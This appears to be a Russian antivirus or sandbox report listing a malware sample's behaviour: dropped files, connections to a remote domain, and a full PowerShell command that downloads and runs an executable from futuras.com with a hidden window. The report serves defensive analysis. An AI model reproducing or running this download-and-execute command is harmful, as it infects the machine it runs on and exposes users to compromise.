Техническая информация
- http://futuras.com/img/dododocdoc.exe как %temp%\sweezy.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://futuras.com/img/dododocdoc.exe','%TMP%\sweezy.exe');Start-Process '%TMP%\sweezy.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\1223843.cvr
- 'fu##ras.com':80
- 'fu##ras.com':443
- http://fu##ras.com/img/dododocdoc.exe
- 'fu##ras.com':443
- DNS ASK fu##ras.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://futuras.com/img/dododocdoc.exe','%TMP%\sweezy.exe');Start-Process '%TMP%\sweezy.exe';' (со скрытым окном)